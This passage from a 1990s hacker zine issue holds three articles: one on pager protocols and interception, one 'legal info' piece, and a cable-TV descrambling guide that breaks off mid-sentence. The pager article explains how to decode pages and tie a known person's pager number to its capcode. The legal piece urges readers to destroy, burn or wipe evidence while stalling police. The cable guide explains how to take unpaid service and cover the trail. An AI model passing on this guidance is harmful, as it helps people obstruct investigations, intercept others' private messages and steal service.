M\<'D(R0#/``GO___Q/___^#_P?G&_\'QP_!\=L'X?,+_P>!WP?QGP?QPP?_!S
M\,'_P=C!_\'FP?/!_\'SP>#!_\'$?\'_P>#__\;____H_\'YPOC!_L'_P?QXE
MPO_!\,'_P?QWP?YAP?_!\,'_P>!_P?![P?_!\\'PP?/!_'O!_,'@P??__\7_&
M___X_\'CP?_!X,'_P?!_P?_!\\'^`\'?`SQ&1___Q?______PO\/P?\/OA\/1
M/___Q/______R/]____$_________\W_________S?_________-________S
M_\W_________S?_________-_________\W_________S?_________-____R
M_____\W_________S?_________-_________\W_________S?_________-R
M_________\W_________S?_________-_________\W_________S?______D
M___-_________\W_________S?_________-_________\W_________S?__R
M_______-_________\W_________S?_________-_________\W_________>
MS?_________-_________\W_________S?_________-_________\W_____R
M____S?_________-_________\W_________S?_________-_________\W_R
M________S?_________-_________\W_________S?_________-________]
M_\W_________S?_________-_________\W_________S?_________-____R
M_____\W_________S?_________-_________\W_________S?_________-R
M_________\W_________S?_"'Y_"W________\C_S`\?G\'_O]/_PI_#_\*_2
MSI_#O\'_QI^_RY^_PI^_G[_!_\6?P[^?O___[/_)!\@/C\*?Q?_(GX^?_X^/'
MPY^/G\*/R)_!WY_"W\'_P=___]/_WP3&!@?'!L0$Q08'Q0\'PP8'#P</!\0/1
/!]0/C\2?C\F?SK___]#_K
``
end
sum -r/size 36774/43500 section (from first encoded line to "end")
sum -r/size 656/73815 entire input file


--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                  Volume Five, Issue Forty-Six, File 8 of 28

****************************************************************************


                     The Wonderful World of Pagers

                            by Erik Bloodaxe

Screaming through the electromagnet swamp we live in are hundreds of
thousands of messages of varying degrees of importance.  Doctors,
police, corporate executives, housewives and drug dealers all find
themselves constantly trapped at the mercy of a teeny little box:
the pager.

Everyone has seen a pager; almost everyone has one.  Over 20 million
pagers are on the streets in the US alone, sorting out their particular
chunk of the radio-spectrum.  Another fifty-thousand more are
put into service each day.

But what the hell are these things really doing?  What more can we
do with them than be reminded to call mom, or to "pick up dry-cleaning?"

Lots.


** PROTOCOLS **

Pagers today use a variety of signalling formats such as POCSAG, FLEX
and GOLAY.  The most common by far is POCSAG (Post Office Standardization
Advisory Group), a standard set by the British Post Office and adopted
world-wide for paging.

POCSAG is transmitted at three transmission rates--512, 1200 and 2400 bps.
Most commercial paging companies today use at least 1200, although many
companies who own their own paging terminals for in-house use transmit
at 512.  Nationwide carriers (SkyTel, PageNet, MobileComm, etc.) send
the majority of their traffic at 2400 to make the maximum use of
their bandwidth.  In other words, the faster they can deliver pages,
the smaller their queue of outgoing pages is.  Although these
carriers have upgraded their equipment in the field to broadcast at
2400 (or plan to do so in the near future), they still send out
some pages at 1200 and 512 to accommodate their customers with older
pagers.  Most 512 and 1200 traffic on the nationwide services is
numeric or tone-only pages.

POCSAG messages are broadcast in batches.  Each batch is comprised of 8
frames, and each frame contains two codewords separated by a
"synchronization" codeword.  A message can have as many codewords
as needed to deliver the page and can stretch through several batches
if needed.  The end of a complete message is indicated by a "next address"
codeword.  Both addressing and user data are sent in the codewords, the
distinction being the least significant bit of the codeword:
0 for address data, and 1 for user-data.

Standard alphanumeric data is sent in a seven-bit format, with each codeword
containing 2 6/7 characters.  A newer 8-bit alphanumeric format is
implemented by some carriers which allow users to send data such as
computer files, graphics in addition to regular alphanumeric messages.
The 8 bit format allows for 2.5 characters per codeword.

Numeric data is 4 bit, allowing up to 5 numbers to be transmitted per
codeword.  Tone and voice pages contain address information only.

(NOTE:  Pager data uses BCH 32,21 for encoding.  I don't imagine
 very many of you will be trying to decode pager data by building your
 own decoders, but for those of you who may, take my interpretation
 of POCSAG framing with a grain of salt, and try to dig up the
 actual POCSAG specs.)

** THE PAGING RECEIVER **

Paging receivers come in hundreds of shapes and sizes, although the vast
majority are manufactured by Motorola.  Numeric pagers comprise over
fifty percent all pagers in use.   Alphanumeric comprises about thirty
percent, with tone and voice pagers making up the remainder.

Pagers are uniquely addressed by a capcode.  The capcode is usually six
to eight digits in length, and will be printed somewhere on the pager
itself.  Many pager companies assign customers PIN numbers, which are
then cross-referenced to a given capcode in databases maintained by
the service provider.  PIN numbers have no other relationship
to the capcode.

Tone pagers are by far the most limited paging devices in use.
When a specified number has been called, an address only message
is broadcast, which causes the intended receiver to beep.  Wow.
Tone pagers usually have 4 capcodes, which can correspond to
different locations to call back.  Voice pagers are similar, except
they allow the calling party to leave a 15 to 30 second message.
The voice message is broadcast immediately after the capcode of the
receiver, which unsquelches the device's audio.

Numeric pagers, although seemingly limited by their lack of display
options have proven otherwise by enterprising users.  Most numeric
data sent is obviously related to phone numbers, but numerous users
have developed codes relating to various actions to be carried out
by the party being paged.  The most prolific users of this have
been the Chinese who have one of the most active paging networks
in the world.  I suppose the next biggest users of code-style numeric
paging would be drug dealers.  (2112 0830 187 -- get to the fucking
drop site by 8:30 or I'll bust a cap in your ass!)  :)

Alphanumeric pagers are most often contacted through a dedicated
service that will manually enter in the message to be sent onto the
paging terminal.  One such service, NDC, offers its phone-answering
and message typing services to various pager companies.  Next time
you are talking to a pager operator, ask him or her if they are at
NDC.  They probably are.

In addition to the capcode, pagers will have an FCC ID number, a serial
number, and most importantly, the frequency that the device has been
crystaled for imprinted on the back of the device.  Although technology
exists that would allow pagers to listen on a number of frequencies
by synthesizing the frequency rather than using a crystal, pager
manufacturers stick to using crystals to "keep the unit cost down."

Pagers may have multiple capcodes by which they can be addressed by.
Multiple capcodes are most often used when a person has subscribed to
various services offered by their provider, or when the subscriber is
part of a group of individuals who will all need to receive the same
page simultaneously (police, EMTs, etc.).

Most low-cost pagers have their capcode stored on the circuit board
in a PAL.  Most paging companies will completely exchange pagers
rather than remove and reprogram the PAL, so I don't think
it's worth it for any experimenter to attempt.  However, like most
Motorola devices, many of their paging products can be reprogrammed
with a special serial cable and software.  Reprogramming software
is usually limited to changing baud rates, and adding capcodes.

Additionally, some units can be reprogrammed over the air by the
service provider.  Using a POCSAG feature known as OTP (over the air
programming) the service provider can instruct the paging receiver to
add capcodes, remove capcodes, or even shut itself down in the case
of non-payment.

** SERVICES **

With the growing popularity of alphanumeric pagers, many service providers
have decided to branch out into the information business.  The most
common of these services is delivery of news headlines.  Other services
include stock quotes, airline flight information, voice mail and
fax reception notification, and email.  Of course, all of these services
are available for a small additional monthly premium.

Email is probably the single coolest thing to have sent to your
alpha pager.  (Unless you subscribe to about a zillion mailing lists)
Companies like SkyTel and Radiomail give the user an email address
that automatically forwards to your paging device.
IE: PIN-NUMBER@skymail.com.  Several packages exist for forwarding
email from a UNIX system by sending stripping down the email to
pertinent info such as FROM and SUBJECT lines, and executing a script
to send the incoming mail out via a pager terminal data port.
One such program is IXOBEEPER, which can be found with an archie
query.

Radiomail's founder, (and rather famous ex-hacker in his own right - go
look at ancient ComputerWorld headlines), Geoff Goodfellow had devised
such a method back in the late 70's.  His program watched for incoming
email, parsed the mail headers, and redirected the FROM and SUBJECT
lines to his alphanumeric pager.  Obviously, not many people had
alphanumeric pagers at all, much less email addresses on ARPANET
back in the 70's, so Geoff's email pager idea didn't see much
wide-spread use until much later.

Two RFC's have been issued recently regarding paging and the Internet.
RFC 1568, the Simple Network Paging Protocol, acts similarly to SMTP.
Upon connecting to the SNPP port the user issues commands such as:

        PAGE followed by pager telephone number
        MESS followed by the alpha or numeric message
        SEND
      & QUIT

RFC 1568 has met with some opposition in the IETF, who don't consider
it worthwhile to implement a new protocol to handle paging, since it
can be handled easily using other methods.

The other RFC, number 1569, suggests that paging be addressed in a rather
unique manner.  Using the domain TPC.INT, which would be reserved for
services that necessitate the direct connection to The Phone Company,
individual pagers would be addressed by their individual phone numbers.
Usernames would be limited to pager-alpha or pager-numeric to represent
the type of pager being addressed.  For example, an alpha-page being sent to
1-800-555-1212 would be sent as pager-alpha@2.1.2.1.5.5.5.0.0.8.1.tcp.int.

** PAGING TERMINAL DATA PORTS **

Many services offer modem connections to pager terminals so that
computer users can send pages from their desks using software packages
like WinBeep, Notify! or Messenger.  All of these services connect to
the pager terminal and speak to it using a protocol known as
IXO.

Upon connection, a pager terminal identifies itself with the following:

ID=

(I bet you always wondered what the hell those systems were)
Paging terminals default to 300 E71, although many larger companies
now have dialups supporting up to 2400.

Many such systems allow you to manually enter in the appropriate information
by typing a capital "M" and a return at the ID= prompt.  The system will then
prompt you for the PIN of the party you wish to page, followed by a prompt
for the message you wish to send, followed by a final prompt asking if you
wish to send more pages.  Not every pager terminal will support a manual
entry, but most do.

All terminals support the IXO protocol.  As there are far too many
site specific examples within the breadth of IXO, we will concentrate on
the most common type of pager services for our examples.

[  Sample IXO transaction of a program sending the message ABC to PIN 123
   gleened from the IXOBeeper Docs                                         ]

Pager Terminal                          YOU
--------------------------------------------------------------
                                        <CR>
ID=
                                        <ESC>PG1<CR>
Processing - Please Wait
                                        <CR>
<CR>
ACK <CR>
<ESC>[p <CR>
                                        <STX>123<CR>
                                        ABC<CR>
                                        <ETX>17;<CR>
<CR>
ACK <CR>
                                        <EOT><CR>
<ESC>EOT <CR>


The checksum data came from:

STX     000 0010
1       011 0001
2       011 0010
3       001 0011
<CR>    000 1101
A       100 0001
B       100 0010
C       100 0011
<CR>    000 1101
ETX     000 0011
----------------
     1 0111 1011
----------------
     1    7    ;  Get it?  Get an ASCII chart and it will all make sense.


Note:  Everything in the paging blocks, from STX to ETX inclusive are used
       to generate the checksum.  Also, this is binary data, guys...you can't
       just type at the ID= prompt and expect to have it recognized as IXO.
       It wants specific BITS.  Got it?  Just checking...


** PAGER FREQUENCIES - US **

[Frequencies transmitting pager information are extremely easy to
 identify while scanning.   They identify each batch transmission
 with a two-tone signal, followed by bursts of data.  People with
 scanners may tune into some of the following frequencies to
 familiarize themselves with this distinct audio.]

Voice Pager Ranges:      152.01   - 152.21
                         453.025  - 453.125
                         454.025  - 454.65
                         462.75   - 462.925

Other Paging Ranges:      35.02   -  35.68
                          43.20   -  43.68
                         152.51   - 152.84
                         157.77   - 158.07
                         158.49   - 158.64
                         459.025  - 459.625
                         929.0125 - 931.9875

** PAGER FREQUENCIES - WORLD **

Austria         162.050  - 162.075         T,N,A
Australia       148.100  - 166.540         T,N,A
                411.500  - 511.500         T,N,A
Canada          929.025  - 931-975         T,N,A
                138.025  - 173.975         T,N,A
                406.025  - 511.975         T,N,A
China           152.000  - 172.575           N,A
Denmark                    469.750           N,A
Finland                    450.225         T,N,A
                146.275  - 146.325         T,N,A
France          466.025  - 466.075         T,N,A
Germany         465.970  - 466.075         T,N,A
                           173.200         T,N,A
Hong Kong                  172.525           N,A
                           280.0875        T,N,A
Indonesia       151.175  - 153.050             A
Ireland         153.000  - 153.825         T,N,A
Italy                      466.075         T,N,A
                           161.175         T,N
Japan           278.1625 - 283.8875         T,N
Korea           146.320  - 173.320         T,N,A
Malaysia        152.175  - 172.525           N,A,V
                           931.9375          N,A
Netherlands     156.9865 - 164.350         T,N,A
New Zealand     157.925  - 158.050         T,N,A
Norway          148.050  - 169.850         T,N,A
Singapore                  161.450           N,A
                           931.9375          N,A
Sweden                     169.8           T,N,A
Switzerland                149.5           T,N,A
Taiwan                     166.775           N,A
                           280.9375          N,A
Thailand                   450.525           N,A
                172.525  - 173.475           N,A
UK              138.150  - 153.275         T,N,A
                454.675  - 466.075         T,N,A

T = Tone
N = Numeric
A = Alphanumeric
V = Voice


** INTERCEPTION AND THE LAW **

For many years the interception of pages was not considered an
invasion of privacy because of the limited information provided
by the tone-only pagers in use at the time.  In fact, when
Congress passed the Electronic Communications Privacy Act in 1986
tone-only pagers were exempt from its provisions.

According to the ECPA, monitoring of all other types of paging signals,
including voice, is illegal.  But, due to this same law, paging
transmissions are considered to have a reasonable expectation to
privacy, and Law Enforcement officials must obtain a proper court
order to intercept them, or have the consent of the subscriber.

To intercept pages, many LE-types will obtain beepers programmed with
the same capcode as their suspect.  To do this, they must contact
the paging company and obtain the capcode associated with the person
or phone number they are interested in.  However, even enlisting
the assistance of the paging companies often requires following
proper legal procedures (warrants, subpoenas, etc.).

More sophisticated pager-interception devices are sold by a variety
of companies.  SWS Security sells a device called the "Beeper Buster"
for about $4000.00.  This particular device is scheduled as
a Title III device, so any possession of it by someone outside
a law enforcement agency is a federal crime.  Greyson Electronics
sells a package called PageTracker that uses an ICOM R7100
in conjunction with a personal computer to track and decode pager
messages.  (Greyson also sells a similar package to decode
AMPS cellular messages from forward and reverse channels called
"CellScope.")

For the average hacker-type, the most realistic and affordable option
is the Universal M-400 decoder.  This box is about 400 bucks and
will decode POCSAG at 512 and 1200, as well as GOLAY (although I've never
seen a paging service using GOLAY.)  It also decodes CTCSS, DCS, DTMF,
Baudot, ASCII, SITOR A & B, FEC-A, SWED-ARQ, ACARS, and FAX.  It
takes audio input from any scanners external speaker jack, and
is probably the best decoder available to the Hacker/HAM for the price.

Output from the M400 shows the capcode followed by T, N or A (tone, numeric
or alpha) ending with the message sent.  Universal suggests hooking
the input to the decoder directly to the scanner before any de-emphasis
circuitry, to obtain the true signal.  (Many scanners alter the audio
before output for several reasons that aren't really relevant to this
article...they just do. :) )

Obviously, even by viewing the pager data as it streams by is of little
use to anyone without knowing to whom the pager belongs to.  Law Enforcement
can get a subpoena and obtain the information easily, but anyone else
is stuck trying to social engineer the paging company.  One other alternative
works quite well when you already know the individuals pager number,
and need to obtain the capcode (for whatever reason).

Pager companies will buy large blocks in an exchange for their customers.
It is extremely easy to discover the paging company from the phone number
that corresponds to the target pager either through the RBOC or by paging
someone and asking them who their provider is when they return your call.
Once the company is known, the frequencies allocated to that company
are registered with the FCC and are public information.  Many CD-ROMs
are available with the entire FCC Master Frequency Database.
(Percon sells one for 99 bucks that covers the whole country -
716-386-6015)  Libraries and the FCC itself will also have this information
available.

With the frequency set and a decoder running, send a page that will be
incredibly easy to discern from the tidal wave of pages spewing
forth on the frequency.  (6666666666, THIS IS YOUR TEST PAGE, etc...)
It will eventually scroll by, and presto!  How many important people
love to give you their pager number?

** THE FUTURE **

With the advent of new technologies pagers will become even more
present in both our businesses and private lives.  Notebook computers
and PDAs with PCMCIA slots can make use of the new PCMCIA pager cards.
Some of these cards have actual screens that allow for use without the
computer, but most require a program to pull message data out.  These
cards also have somewhat large storage capacity, so the length of
messages have the option of being fairly large, should the service
provider allow them to be.

With the advent of 8-bit alphanumeric services, users with PCMCIA pagers
can expect to receive usable computer data such as spreadsheet
entries, word processing documents, and of course, GIFs.  (Hey, porno
entrepreneurs:  beeper-porn!  Every day, you get a new gif sent to your
pagecard!  Woo Woo.  Sad thing is, it would probably sell.)

A branch of Motorola known as EMBARC (Electronic Mail Broadcast to A
Roaming Computer) was one of the first to allow for such broadcasts.
EMBARC makes use of a proprietary Motorola protocol, rather than
POCSAG, so subscribers must make use of either a Motorola NewsStream
pager (with nifty serial cable) or a newer PCMCIA pager.  Messages are
sent to (and received by) the user through the use of special client
software.

The software dials into the EMBARC message switch accessed through
AT&T's ACCUNET packet-switched network.  The device itself is used
for authentication (most likely its capcode or serial number)
and some oddball protocol is spoken to communicate with the switch.

Once connected, users have the option of sending a page out, or
retrieving pages either too large for the memory of the pager, or
from a list of all messages sent in the last 24 hours, in case the
subscriber had his pager turned off.

Additionally, the devices can be addressed directly via x.400
addresses.  (X.400: The CCITT standard that covers email address
far too long to be worth sending anyone mail to.)  So essentially,
any EMBARC customer can be contacted from the Internet.

MTEL, the parent company of the huge paging service SkyTel, is
implementing what may be the next generation of paging technologies.
This service, NWN, being administrated by MTEL subsidiary Destineer,
is most often called 2-way paging, but is more accurately Narrowband-PCS.

The network allows for the "pager" to be a transceiver.  When a page
arrives, the device receiving the page will automatically send back
an acknowledgment of its completed reception.  Devices may also
send back some kind of "canned response" the user programs.  An example
might be:  "Thanks, I got it!" or "Why on Earth are you eating up my
allocated pages for the month with this crap?"

MTEL's service was awarded a Pioneers Preference by the FCC, which gave them
access to the narrowband PCS spectrum before the auctions.  This is a big
deal, and did not go unnoticed by Microsoft.  They dumped cash into the
network, and said the devices will be supported by Chicago.  (Yeah,
along with every other device on the planet, right?  Plug and Pray!)

The network will be layed out almost identically to MTEL's existing paging
network, using dedicated lines to connect towers in an area to a central
satellite up/downlink.  One key difference will be the addition of
highly somewhat sensitive receivers on the network, to pick up the ACKs
and replies of the customer units, which will probably broadcast at
about 2 or 3 watts.  The most exciting difference will be the
speed at which the network transmits data:  24,000 Kbps.  Twenty-four
thousand.  (I couldn't believe it either.  Not only can you get your
GIFs sent to your pager, but you get them blinding FAST!)  The actual
units themselves will most likely look like existing alphanumeric pagers
with possibly a few more buttons, and of course, PCMCIA units will
be available to integrate with computer applications.

Beyond these advancements, other types of services plan on offering
paging like features.  CDPD, TDMA & CDMA Digital Cellular and ESMR
all plan on providing a "pager-like" option for their customers.
The mere fact that you can walk into a K-Mart and buy a pager
off a rack would indicate to me that pagers are far to ingrained into
our society, and represent a wireless technology that doesn't scare
or confuse the yokels.  Such a technology doesn't ever really go away.


** BIBLIOGRAPHY **

Kneitel, Tom, "The Secret Life of Beepers," _Popular Communications_,
         p. 8, July, 1994.

O'Brien, Michael, "Beep! Beep! Beep!," _Sun Expert_, p. 17, March, 1994.

O'Malley, Chris, "Pagers Grow Up," _Mobile Office_, p. 48, August, 1994.


--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Five, Issue Forty-Six, File 9 of 28

****************************************************************************

                           Legal Info
                        by Szechuan Death

     OK.  This document applies only to United States citizens: if
you are a citizen of some other fascist country, don't come whining
to me when this doesn't work..... :)

     Make no mistake:  I'm not a lawyer.  I've merely paid
attention and picked up some facts that might be useful to me along
the way.  There are three subjects that it pays to have a knowledge
of handy:  prescription drugs, medical procedures, and legal facts.
While these may all be boring as hell, they can certainly pull your
ass out of the fire in a pinch.

     Standard disclaimer:  I make no claims about this document or
facts contained therein.  I also make no claims about their legal
authenticity:  if you want to be 100% sure, there's a library in
damn near every town, LOOK IT UP!

     One more thing:  This document is useful for virtually
ANYTHING.  It's effectiveness stretches far beyond computer hacking
(although it's worn a bit thin for serious crimes, as every cretin
on Death Row has tried it already.....:)

     OK.  Let's say, just for the sake of argument, that you've
decided to take a walk along the wild side and do something
illegal.  For our purposes, let's say computer hacking (imagine
that).  There are many things you can do cover your legal ass,
should your activities come to the attention of any of our various
friendly law-enforcement agencies nationwide.


--  Part 1:  Police Mentality

     You must understand the police, if you ever want to be able to
thwart them and keep your freedom.  Most police, to survive in
their jobs, have developed an "Us vs. Them" attitude, which we
should tolerate (up to a point).  They use this attitude to justify
their fascist tactics.  "Us" is the police, a brotherhood that
keeps the peace, always does right, and never snitches on each
other, no matter what the cause.  "Them" is the rest of the
population.  If "They" are not guilty of a specific crime, they
must have done something else, and they're doing their damndest to
avoid getting caught.  In addition, many police have cultivated an
attitude similar to that of a 15-year-old high school punk:  "I'm
bad, I'm bad, I'm SOOOOO bad, I Am Cop, Hear Me ROAR," etc.
Unfortunately, these people have weapons and the authority to
support that attitude.  Therefore, if the police come to your
house, be EXTREMELY polite and subservient; now is not the time to
start spouting your opinion about the police state in America
today.  Also, DO NOT RESIST THEM IF THEY ARREST YOU.  Besides
adding a charge of "Resisting Arrest" and/or "Assaulting an
Officer", it can get very dangerous.  The police have been trained
in a number of suspect-control techniques, most of which involve
twisting body parts at unnatural angles.  As if this weren't
enough, almost all police carry guns.  Start fighting and you'll
get a couple broken bones, torn ligaments, or worse, a few bullet
wounds (possibly fatal).  So remember, be very meek.  Show them
that you are cowed by their force and their blustering presence,
and this will save you a black eye or two on the way down to the
station (from tripping and falling, of course).

--  Part 2:  Hacker's Security

     CARDINAL RULE #1:  Get rid of the evidence.  No evidence = no
case for the prosecutor.  The Novice Hacker's Guide from LOD has an
excellent way to put this:

VIII. Don't be afraid to be paranoid.  Remember, you *are* breaking the law.
      It doesn't hurt to store everything encrypted on your hard disk, or
      keep your notes buried in the backyard or in the trunk of your car.  You
      may feel a little funny, but you'll feel a lot funnier when you when you
      meet Bruno, your transvestite cellmate who axed his family to death.

Basic hints:
Hide all your essential printouts, or burn them if they're trash
(remember:  police need no warrant to search your trash).  Encrypt
the files on your hard drive with something nasty, like PGP or RSA.
Use a file-wiper, NOT delete, to get rid of them when you're done.
And WIPE, don't FORMAT, your floppies and other magnetic media
(better still, degauss them).  With a little common sense and a bit
of effort, a great deal of legal headaches can be avoided.


--  Part 3A:  Polite Entry

     Next part.  You and your friends are enjoying an evening of
trying to polevault the firewall on whitehouse.com, when suddenly
you hear a knock at the door.  Opening the door, you find a member
of the local police force standing outside, asking if he can come
in and ask you some questions.  Now, here's where you start to piss
your pants.  If you were smart, you'll have arranged something
beforehand where your friends (or, if there ARE no friends present,
an automatic script) are getting rid of the evidence as shown in
part 2.  If you have no handy means of destroying the data
(printouts, floppies, tapes, etc.), throw the whole mess into
the bathtub, soak it in lighter fluid, and torch it.  It's a
helluva mess to clean up, but nothing compared to latrine duty at
your nearest federal prison.

     While the evidence is being destroyed, you're stalling the
police.  Ask to see their search warrant and IDs.  Mull over each
and every one of them for at least 5 minutes.  If they have none,
start screaming about your 4th Amendment rights.  Most importantly:
DON'T INVITE THEM IN.  They're like vampires:  if you let them in,
you're fucked.  If they see anything even REMOTELY incriminating,
that constitutes probable cause for a search and they'll be
swarming all over your house like flies on shit.  (And guess what!
It's legal, because YOU LET THEM IN!)  Now, be aware that this
won't stall them forever:  they can simply wait outside the house
and radio in a request for a search warrant, which will probably be
signed by the judge on duty at that time.  Remember:  "If you're
not willing to be searched, you MUST have something to hide!"  If
there are no friends assisting you, as shown above, USE THIS TIME
EFFECTIVELY.  When they get the warrant signed, that will be too
late, because you'll have erased/shredded/burned/hidden/etc. all
the incriminating evidence.


--  Part 3B:  And Suddenly, The Door Burst In

     Now, if the police already have a search warrant, they don't
need to knock on the door.  They can simply kick the door down and
waltz in.  If you're there at the time, you CAN try and stall them
as shown above, by asking to see their search warrant and IDs.
This may not work now, because they have you cold, hard, and dead
to rights.  And, if anything incriminating is in a place where they
can find it, you're fucked, because it WILL be used as evidence.
But this won't happen to you, because you've already put everything
you're not using right at the moment in a safe, HIDDEN, place.
Right?

     This leaves the computer.  If you hear them kicking the door
in, keep calm, and run a script you've set up beforehand to low-
level-format the drive, wipe all hacking files, encrypt the whole
thing, etc.  If there's any printouts or media hanging out, try and
hide them (probably worthless anyway, but worth a try).  The name
of the game now is to minimize the damage that can be done to you.
The less hard evidence linking you to the "crime", the less of a
case the prosecutor will have and the better off you'll be.


--  Part 4:  The Arrest

     Now is the time to kick all your senses into hyper-record
mode.  For you to get processed through the system without a hitch,
the arrest has to go perfectly, by the numbers.  One small slip and
you're out through a loophole.  Now, the police are aware of this
and will be doing their best to see that doesn't happen, but you
may get lucky all the same.  First of all:  According to the
Miranda Act, the police are REQUIRED BY LAW to read you your rights
and make sure you understand them.  Remember EVERY WORD THEY SAY TO
YOU.  If they don't say it correctly, you may be able to get off on
a technicality.

     CARDINAL RULE #2:  You have the right to remain silent.
EXERCISE IT.  This cannot be stressed enough.  If you need a
reminder, listen to the first part of the Miranda Warning:

     "You have the right to remain silent.  If you give up that
right, ANYTHING YOU SAY CAN AND WILL BE USED AGAINST YOU IN A COURT
OF LAW."

     Nice ring to it, hmm?  The only words coming out of your mouth
at this point should be "I'd like to speak to my attorney, please"
and, if applicable in your area, "I'd like to make a phone call,
please"  (remember the "please's," see part #1 above)  Nothing
else.  There are tape recorders, video cameras, PLUS the word of a
dozen police officers to back it all up.  How's that for an array
of damning evidence against you?

     Then, after the ride downtown, you'll be booked and probably
asked a few questions.  Say nothing.  You're probably pissing your
pants with fear at this point, and may be tempted to roll over on
everyone you ever shook hands with in your whole life, but keep
your calm, and KEEP QUIET.  Keep asking for your attorney and/or a
phone call, no matter WHAT threats/deals/etc. they make to you.
Remember, they can't legally interrogate you without your attorney
present.  You may also be tempted to show your mettle at this
point, and give them false information, but remember one thing:  If
you lie to them, you can be convicted of perjury (a nasty offense
itself).  The best policy here is NSA:  Never Say Anything.
Remember, you never have to keep track of what you've said, or have
to worry about having it used against you, if you've said NOTHING.


--  Part 5:  The Trial

     Here, we'll assume you've been arrested, booked, let out on
bail, indicted on X counts of so-and-so, etc.  You're now in the
system.  CARDINAL RULE #3:  Get the best criminal defense attorney
you can afford, preferably one with some background in the crime
you've committed.  No, scratch that:  make that the best criminal
defense attorney, PERIOD.  It's a helluva lot better to spend 5
years working at McDonald's 12 hours a day to pay back your legal
fee, than it is to spend 5 years in the slammer getting pimped out
nightly for a pack of menthols.  Also, pay attention during the
trial.  Remember, the defense attorney is working for YOU:  it's
YOUR life they're deciding, so give him every bit of information
and help you can.  You're paying him to sort it out for you, but
you should still keep an eye on things:  if, in the middle of a
trial, something happens (you get a killer idea, or want to jump up
and scream "BULLSHIT!"), TELL HIM!  It very well might be useful!
Also, have him nitpick every single thing for loopholes,
technicalities, civil rights violations, etc.  It's worth it if it
pays off.

     Another important thing is to look good.  Image is everything.
Although you might prefer to wear heavily stained rock-band T-
shirts, leather jackets, ratty jeans, etc. in real life, that will
be EXTREMELY damning in the eyes of the judge/jury.  They say that
clothes make the man, and in this case it's REALLY true:  get a
suit, comb/cut your hair, shave, etc.  Make yourself look like a
"positively respectable darling" in the eyes of the court!  It'll
pay off for you. (hey, it worked for Eric and Lyle Menendez)


--  Part 8:  The Prison

     If you're here, you're totally fucked.  Unless, by divine
intervention, your conviction is overturned on appeal, you'd better
clear up the next 5 years on your calendar.  Apparently, you didn't
read closely enough, so read this every day during your long stay
in prison, and you'll be better equipped next time (assuming there
IS a next time..... :)


     Remember the cardinal rules:  1)  Don't leave evidence around
to be found.  2)  KEEP CALM AND KEEP QUIET.  3)  Get the best
attorney available.  If you remember these, and exercise some common
sense and a lot of caution, you should have no problem handling any
legal problems that come up.

     Note:  This is intended to be used as a handbook for defense
from minor crimes ONLY (hacking, DWI, etc.)  If you're a career
criminal, or you've murdered or raped somebody, you're scum, and at
least have the grace to plead "guilty".  Don't waste the tax-
payers' time and money with fancy legal footwork.

     Please feel free to add anything or correct this document.
However, if you DO add or correct something, PLEASE make sure it's
true, and PLEASE email me the changes so I can include them in the next
revision of the document.  My address is pstlb@acad3.alaska.edu.  Happy
hacking to all, and if this helps you avoid getting caught, so much the
better.  :)


--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Five, Issue Forty-Six, File 10 of 28

****************************************************************************

                   /**************************/
                   /* A Guide to Porno Boxes */
                   /*     by Carl Corey      */
                   /**************************/


Keeping with tradition, and seeing that this is the first article in
Phrack on cable TV descrambling, any illegal box for use in descrambling
cable television signals is now known as a PORNO BOX.

There are many methods that cable companies use to insure that you get
what you pay for - and _only_ what you pay for.  Of course, there are
always methods to get 'more than you pay for'.  This file will discuss
the most important aspects of these methods, with pointers to more
detailed information, including schematics and resellers of equipment.


Part I.  How the cable company keeps you from getting signals
   A brief history

---Older Systems---

Most scrambling methods are, in theory, simple.  The original method
used to block out signals was the trap method.  All traps remove signals
that are sent from the CATV head end (the CATV company's station).  The
first method, which is rarely used anymore was the negative trap.
Basically, every point where the line was dropped had these traps, which
removed the pay stations from your signal.  If you decided to add a pay
station, the company would come out and remove the trap.  This method was
pretty secure - you would provide physical evidence of tampering if you
climbed the pole to remove them or alter them (sticking a pin through
them seemed to work randomly, but could affect other channels, as it
shifts the frequency the trap removes.)  This was a very secure system,
but did not allow for PPV or other services, and required a lot of
physical labor (pole-climbers aren't cheap).  The only places this is
used anymore is in an old apartment building, as one trip can service
several programming changes.  Look for a big gray box in the basement
with a lot of coax going out.  If you are going to give yourself free
service, give some random others free service to hide the trail.

The next method used was termed a positive trap.  With this method, the
cable company sends a _very_ strong signal above the real signal.  A
tuner sees the strong signal, and locks onto the 'garbage' signal.  A
loud beeping and static lines would show up on the set.  For the CATV
company to enable a station, they put a 'positive' trap on the line,
which (despite the name) removes the garbage signal.  Many text files
have been around on how to descramble this method (overlooking the
obvious, buying a (cheap) notch filter), ranging from making a crude
variable trap, to adding wires to the cable signal randomly to remove the
signal.  This system is hardly used anymore, as you could just put a trap
inside your house, which wouldn't be noticed outside the house.

---Current Systems---

The next advent in technology was the box.  The discussion of different
boxes follows, but there is one rather new technology which should be
discussed with the traps.  The addressable trap is the CATV's dream.  It
combines the best features of the negative trap (very difficult to tamper
with without leaving evidence) with features of addressable boxes (no
lineman needs to go out to add a service, computers can process Pay Per
View or other services).  Basically, a 'smart trap' sits on the pole and
removes signals at will.  Many systems require a small amp inside the
house, which the cable company uses to make sure that you don't hook up
more than one TV.  I believe that the new CATV act makes this illegal,
and that a customer does not have to pay for any extra sets (which do not
need equipment) in the house.  Of course, we all know that the cable TV
company will do whatever it wants until it is threatened with lawsuits.

Cable boxes use many different methods of descrambling.  Most are not in
use anymore, with a few still around, and a few around the corner in the
future.  The big thing to remember is sync suppression.  This method is
how the cable companies make the picture look like a really fucked up,
waving Dali painting.  Presently the most popular method is the Tri-mode
In-band Sync suppression.  The sync signal is suppressed by 0, 6, or 10
dB.  The sync can be changed randomly once per field, and the information
necessary for the box to rebuild a sync signal.  This very common system
is discussed in Radio-Electronics magazine in the 2/87 issue.  There are
schematics and much more detailed theory than is provided here.

The other common method currently used is SSAVI, which is most common on
Zenith boxes.  It stands for Sync Suppression And Video Inversion.  In
addition to sync suppression, it uses video inversion to also 'scramble'
the video.  There is no sync signal transmitted separately (or reference
signal to tell the box how to de-scramble) as the first 26 lines (blank,
above the picture) are not de-synched, and can be re-synched with a
phased lock loop - giving sync to the whole field.  The data on inversion
is sent somewhere in the 20 or 21st line, which is outside of the
screen.  Audio can be scrambled too, but it is actually just moved to a
different frequency.  Radio Electronics August 92 on has circuits and
other info in the Drawing Board column.

---Future Systems-

For Pioneer, the future is now.  The system the new Pioneers use is
